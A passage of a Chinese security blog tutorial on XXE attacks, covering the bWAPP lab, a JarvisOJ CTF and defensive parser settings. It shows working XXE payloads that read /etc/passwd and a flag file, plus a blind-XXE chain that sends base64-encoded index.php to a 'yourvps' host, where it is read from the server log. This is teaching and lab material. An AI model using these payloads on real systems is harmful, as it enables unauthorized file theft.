<p>xml内容为<br><figure class="highlight mojolicious"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="xml"><span class="meta">&lt;!DOCTYPE foo [</span></span></span><br><span class="line"><span class="xml">	<span class="tag">&lt;<span class="name">!ENTITY</span>  % <span class="attr">xxe</span> <span class="attr">SYSTEM</span> "<span class="attr">http:</span>//<span class="attr">ip</span>/<span class="attr">xxe.dtd</span>" &gt;</span></span></span><br><span class="line"><span class="xml"></span><span class="perl">	%xxe;</span><span class="xml"></span></span><br><span class="line"><span class="xml">]&gt;</span></span><br><span class="line"><span class="xml"><span class="tag">&lt;<span class="name">root</span>&gt;</span></span></span><br><span class="line"><span class="xml">	<span class="tag">&lt;<span class="name">name</span>&gt;</span>&amp;evil;<span class="tag">&lt;/<span class="name">name</span>&gt;</span></span></span><br><span class="line"><span class="xml"><span class="tag">&lt;/<span class="name">root</span>&gt;</span></span></span><br></pre></td></tr></table></figure></p>
<p><img src="https://ws1.sinaimg.cn/large/005RaR9Jgy1g2xdsskoncj30zi0c40uv.jpg" alt=""><br>相当于:<br><figure class="highlight mojolicious"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="xml"><span class="meta">&lt;!DOCTYPE foo [</span></span></span><br><span class="line"><span class="xml">	<span class="tag">&lt;<span class="name">!ENTITY</span>  % <span class="attr">xxe</span> "&lt;!<span class="attr">ENTITY</span> <span class="attr">evil</span> <span class="attr">SYSTEM</span> '<span class="attr">file:</span>///<span class="attr">etc</span>/<span class="attr">passwd</span>'&gt;</span>" &gt;</span></span><br><span class="line"><span class="xml"></span><span class="perl">	%xxe;</span><span class="xml"></span></span><br><span class="line"><span class="xml">]&gt;</span></span><br><span class="line"><span class="xml"><span class="tag">&lt;<span class="name">root</span>&gt;</span></span></span><br><span class="line"><span class="xml">	<span class="tag">&lt;<span class="name">name</span>&gt;</span>&amp;evil;<span class="tag">&lt;/<span class="name">name</span>&gt;</span></span></span><br><span class="line"><span class="xml"><span class="tag">&lt;/<span class="name">root</span>&gt;</span></span></span><br></pre></td></tr></table></figure></p>
<p><img src="https://ws1.sinaimg.cn/large/005RaR9Jgy1g2xdwdbbauj30z90boac5.jpg" alt=""></p>
<p>如果目标服务器没有回显，就只能用 Blind XXE 了。原理就是带着获取的文件源码以 get 参数或其他形式去访问我们的服务器，然后在日志里就可以找到我们要获取的内容了。</p>
<p>先在我的服务器建一个xxe.xml文件,内容为：<br><figure class="highlight vhdl"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;!<span class="keyword">ENTITY</span> % <span class="keyword">all</span> <span class="string">"&lt;!ENTITY send SYSTEM 'http://yourvps/%file;'&gt;"</span>&gt;</span><br></pre></td></tr></table></figure></p>
<p>接下来读取内容，我们提交<br><figure class="highlight mojolicious"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="xml"><span class="meta">&lt;?xml version="1.0" encoding="utf-8"?&gt;</span></span></span><br><span class="line"><span class="xml"><span class="meta">&lt;!DOCTYPE data [</span></span></span><br><span class="line"><span class="xml"><span class="tag">&lt;<span class="name">!ENTITY</span> % <span class="attr">file</span> <span class="attr">SYSTEM</span> "<span class="attr">php:</span>//<span class="attr">filter</span>/<span class="attr">convert.base64-encode</span>/<span class="attr">resource</span>=<span class="string">index.php</span>"&gt;</span></span></span><br><span class="line"><span class="xml"><span class="tag">&lt;<span class="name">!ENTITY</span> % <span class="attr">dtd</span> <span class="attr">SYSTEM</span> "<span class="attr">http:</span>//<span class="attr">yourvps</span>/<span class="attr">xxe.xml</span>"&gt;</span></span></span><br><span class="line"><span class="xml"></span><span class="perl">%dtd; %all;</span><span class="xml"></span></span><br><span class="line"><span class="xml">]&gt;</span></span><br><span class="line"><span class="xml"><span class="tag">&lt;<span class="name">value</span>&gt;</span>&amp;send;<span class="tag">&lt;/<span class="name">value</span>&gt;</span></span></span><br></pre></td></tr></table></figure></p>
<p>整个的调用过程如下：解析时%dtd引入xxe.xml，之后%all引入send的定义，最后引用了实体send，把%file文件内容通过一个http请求发了出去。注意需要把payload经过url编码。</p>
<p>然后在服务器的log中看到base64加密后的内容(/var/log/httpd/access.log)<br><img src="https://ws1.sinaimg.cn/large/005RaR9Jgy1g337a098y7j30ph06owen.jpg" alt=""></p>
<h2 id="使用bWapp学习"><a href="#使用bWapp学习" class="headerlink" title="使用bWapp学习"></a>使用bWapp学习</h2><p>环境搭建:<br>vulstudy是专门收集当下流行的漏洞学习平台,现在用它来一键搭建bWapp<br>下载vulstudy项目<br>git clone <a href="https://github.com/c0ny1/vulstudy.git" target="_blank" rel="noopener">https://github.com/c0ny1/vulstudy.git</a><br>cd vulstudy/bWapp<br>docker-compose up -d #启动容器<br>注:第一次创建应事先访问/install.php来创建数据库<br>安装好之后，Choose your bug 选择 XML External Entity Attacks (XXE)<br>先抓包<br><img src="https://ws1.sinaimg.cn/large/005RaR9Jgy1g337pc5fb8j30ei05p75j.jpg" alt=""></p>
<p>xxe-1.php页面在向xxe-2.php页面传输数据过程中，其中的xml数据是可控的，也就是说可以构造恶意数据进行传输，添加一个外部实体在XML数据中进行实体调用，从而进行XXE攻击。</p>
<p><img src="https://ws1.sinaimg.cn/large/005RaR9Jgy1g337r3kctyj31qm0jgdjc.jpg" alt=""></p>
<h2 id="CTF"><a href="#CTF" class="headerlink" title="CTF"></a>CTF</h2><p><a href="http://web.jarvisoj.com:9882/" target="_blank" rel="noopener">http://web.jarvisoj.com:9882/</a><br>获得目标机器/home/ctf/flag.txt中的flag值。<br>将Content-Type的值改为application/xml，然后提交xml发现能够被解析<br><img src="https://ws1.sinaimg.cn/large/005RaR9Jgy1g2wpe05i33j30rc0b5jsf.jpg" alt=""><br>于是修改payload为:<br><figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;!DOCTYPE foo [</span></span><br><span class="line"><span class="meta">	&lt;!ENTITY xxe SYSTEM "file:///home/ctf/flag.txt" &gt;</span></span><br><span class="line"><span class="meta">]&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">root</span>&gt;</span></span><br><span class="line">	<span class="tag">&lt;<span class="name">name</span>&gt;</span>&amp;xxe;<span class="tag">&lt;/<span class="name">name</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">root</span>&gt;</span></span><br></pre></td></tr></table></figure></p>
<p><img src="https://ws1.sinaimg.cn/large/005RaR9Jgy1g2wph8hlvij30wj0cldh4.jpg" alt=""></p>
<h1 id="防御"><a href="#防御" class="headerlink" title="防御"></a>防御</h1><p>禁用外部实体<br>php</p>
<figure class="highlight lisp"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">libxml_disable_entity_loader(<span class="name">true</span>)<span class="comment">;</span></span><br></pre></td></tr></table></figure>
<p>java</p>
<figure class="highlight haxe"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">DocumentBuilderFactory dbf =DocumentBuilderFactory.<span class="keyword">new</span><span class="type">Instance</span>();</span><br><span class="line">dbf.setExpandEntityReferences(<span class="literal">false</span>);</span><br></pre></td></tr></table></figure>
<p>python</p>
<figure class="highlight routeros"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> lxml import etree</span><br><span class="line">xmlData = etree.parse(xmlSource,etree.XMLParser(<span class="attribute">resolve_entities</span>=<span class="literal">False</span>))</span><br></pre></td></tr></table></figure>
<h1 id="参考"><a href="#参考" class="headerlink" title="参考"></a>参考</h1><p><a href="https://blog.csdn.net/com_ma/article/details/73277535" target="_blank" rel="noopener">https://blog.csdn.net/com_ma/article/details/73277535</a><br><a href="https://github.com/c0ny1/xxe-lab" target="_blank" rel="noopener">https://github.com/c0ny1/xxe-lab</a><br><a href="https://www.freebuf.com/articles/web/126788.html" target="_blank" rel="noopener">https://www.freebuf.com/articles/web/126788.html</a><br><a href="https://www.freebuf.com/column/188849.html" target="_blank" rel="noopener">https://www.freebuf.com/column/188849.html</a><br><a href="https://www.ibm.com/developerworks/cn/xml/x-entities/" target="_blank" rel="noopener">https://www.ibm.com/developerworks/cn/xml/x-entities/</a></p>

      
    </div>
    
    
    

    

    
      <div>
        <div style="padding: 10px 0; margin: 20px auto; width: 90%; text-align: center;">
  <div></div>
  <button id="rewardButton" disable="enable" onclick="var qr = document.getElementById('QR'); if (qr.style.display === 'none') {qr.style.display='block';} else {qr.style.display='none'}">
    <span>打赏</span>
  </button>
  <div id="QR" style="display: none;">

    
      <div id="wechat" style="display: inline-block">
        <img id="wechat_qr" src="/images/wechatpay.jpg" alt="筱阳 微信支付">
        <p>微信支付</p>
      </div>
    

    
      <div id="alipay" style="display: inline-block">
        <img id="alipay_qr" src="/images/alipay.jpg" alt="筱阳 支付宝">
        <p>支付宝</p>
      </div>
    

    

  </div>
</div>

      </div>
    

    

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/web安全/" rel="tag"># web安全</a>
          
        </div>
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2019/06/01/目录爆破扫描工具dirsearch/" rel="next" title="目录爆破扫描工具dirsearch">
                <i class="fa fa-chevron-left"></i> 目录爆破扫描工具dirsearch
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
        
<script>
  with(document)0[(getElementsByTagName('head')[0]||body).appendChild(createElement('script')).src='//bdimg.share.baidu.com/static/api/js/share.js?cdnversion='+~(-new Date()/36e5)];
</script>

      
    </div>
  </div>


          </div>
          


          

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            站点概览
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope="" itemtype="http://schema.org/Person">
            
              <img class="site-author-image" itemprop="image" src="/images/avatar.png" alt="筱阳">
            
              <p class="site-author-name" itemprop="name">筱阳</p>
              <p class="site-description motion-element" itemprop="description">只会复现的菜鸡</p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives/">
              
                  <span class="site-state-item-count">50</span>
                  <span class="site-state-item-name">日志</span>
                </a>
              </div>
            

            
              
              
              <div class="site-state-item site-state-categories">
                <a href="/categories/index.html">
                  <span class="site-state-item-count">5</span>
                  <span class="site-state-item-name">分类</span>
                </a>
              </div>
            

            
              
              
              <div class="site-state-item site-state-tags">
                <a href="/tags/index.html">
                  <span class="site-state-item-count">12</span>
                  <span class="site-state-item-name">标签</span>
                </a>
              </div>
            

          </nav>

          

          

          
          

          
          
            <div class="links-of-blogroll motion-element links-of-blogroll-block">
              <div class="links-of-blogroll-title">
                <i class="fa  fa-fw fa-link"></i>
                友情链接
              </div>
              <ul class="links-of-blogroll-list">
                
                  <li class="links-of-blogroll-item">
                    <a href="http://www.freebuf.com/" title="freebug" target="_blank">freebug</a>
                  </li>
                
              </ul>
            </div>
          

          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#前言"><span class="nav-number">1.</span> <span class="nav-text">前言</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#基础"><span class="nav-number">2.</span> <span class="nav-text">基础</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#XML和DTD基础"><span class="nav-number">2.1.</span> <span class="nav-text">XML和DTD基础</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#DTD实体声明"><span class="nav-number">2.2.</span> <span class="nav-text">DTD实体声明</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#XXE漏洞"><span class="nav-number">3.</span> <span class="nav-text">XXE漏洞</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#使用bWapp学习"><span class="nav-number">3.1.</span> <span class="nav-text">使用bWapp学习</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#CTF"><span class="nav-number">3.2.</span> <span class="nav-text">CTF</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#防御"><span class="nav-number">4.</span> <span class="nav-text">防御</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#参考"><span class="nav-number">5.</span> <span class="nav-text">参考</span></a></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; <span itemprop="copyrightYear">2019</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">筱阳</span>

  
</div>


  <div class="powered-by">由 <a class="theme-link" target="_blank" href="https://hexo.io">Hexo</a> 强力驱动</div>



  <span class="post-meta-divider">|</span>



  <div class="theme-info">主题 &mdash; <a class="theme-link" target="_blank" href="https://github.com/iissnan/hexo-theme-next">NexT.Mist</a> v5.1.4</div>




        







        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  


  











  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  

  
  
    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  

  
  
    <script type="text/javascript" src="/lib/canvas-nest/canvas-nest.min.js"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.4"></script>



  
  

  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.4"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.4"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.4"></script>



  


  




	





  





  












  





  

  

  

  
  

  

  

  

</body>
</html>
